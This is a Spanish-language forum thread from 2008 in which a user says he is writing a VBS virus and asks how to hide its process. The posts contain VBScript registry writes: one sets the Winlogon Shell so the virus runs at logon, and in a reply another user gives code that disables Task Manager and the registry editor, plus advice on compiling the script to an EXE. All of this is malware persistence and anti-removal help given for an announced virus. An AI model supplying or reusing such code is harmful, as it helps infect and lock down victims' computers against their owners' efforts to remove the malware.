Foro de elhacker.net

Programación => Scripting => Mensaje iniciado por: Enemy en 24 Septiembre 2008, 21:03 pm


Título: Ocultar el proceso Wscript.exe
Publicado por: Enemy en 24 Septiembre 2008, 21:03 pm
Buenas..
Estoy programando un virus en VBS y siempre que lo ejecuto el proceso Wscript se ve en los procesos del admin de tareas. Como hago para que no lo muestre o como hago para Inyectarlo en el Explorer.exe?

Les muestro::

Set Inyec = CreateObject("WScript.Shell")
Inyec.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Winlogon","Shell = "Explorer.exe "[Nom_Carp]\Virus.vbs"""

Es la sintaxis correcta? o como hago para inyectarlo en el Explorer.exe?

O sera mas conveniente pasarlo a EXE?

Gracias de antemano..


SALUD.O.S

Título: Re: Ocultar el proceso Wscript.exe
Publicado por: Novlucker en 24 Septiembre 2008, 21:07 pm
No es posible hacer eso, no se puede "inyectar" el proceso del wscript en el explorer, y para ser más gráfico, no se puede inyectar nada con el wsh, la única manera de hacer que no se vea este proceso, es impedir que se liste los procesos que están en ejecución, deshabilitando el taskmgr, y ms-dos   :rolleyes:

Siento que no sea la respuesta que buscabas, pero es la única que puedo darte  :-\

Saludos

Título: Re: Ocultar el proceso Wscript.exe
Publicado por: Enemy en 24 Septiembre 2008, 21:13 pm
Gracias Novlucker..

Pero, Creo que si se pueden inyectar procesos al explorer.exe ...

Por eso preguntaba, si se puede pasar el VBS a EXE.

Entonces decis que deshabilite el admin de tareas y la consola verdad?

Set DeshabCmd = CreateObject("WScript.Shell")
DeshabCmd.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System DisableCMD 0

Y el admin?



SALUD.O.S


Título: Re: Ocultar el proceso Wscript.exe
Publicado por: Novlucker en 24 Septiembre 2008, 21:23 pm
Si, es posible inyectar procesos en el explorer.exe, pero a traves de la clave shell, solo inicias el proceso a traves del explorer.exe, igualmente el proceso será ejecutado por medio de wscript.exe o cscript.exe, después de todo son sus interpretes, por lo que como dije, no puede inyectarse ningún script vbs en nada, eso puedes hacerlo en otros lenguajes, y no de scripting

Lo de compilarlo, simplemente utiliza el vb6 y podrás compilarlo sin problemas.

Para el administrador de tareas y además el regedit --->

Código
  1. Set WshShell = WScript.CreateObject("WScript.Shell")
  2. WshShell.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
  3. WshShell.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"

Saludos  ;)

Título: Re: Ocultar el proceso Wscript.exe
Publicado por: Enemy en 24 Septiembre 2008, 22:03 pm
EL VB6 , Puede compilar el vbs sin ningun drama?

Eso voy a intentar..

Gracias hermano.. eres de ayuda.

Mas adelante posteare el codigo completo de mi virus para que me ayuden a completarlo, lo empeze hace un mes.
Se que tengo errores por eso las ayudas..

Gracias nuevamente..


SALUD.O.S

Título: Re: Ocultar el proceso Wscript.exe
Publicado por: Novlucker en 24 Septiembre 2008, 22:53 pm
Si, el vb6 no tendrá ningún problema, puede que alguna función en especifico no sirva, como puede ser wscript.scriptfullname, pero basta con buscar su equivalente  ;)

Saludos


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines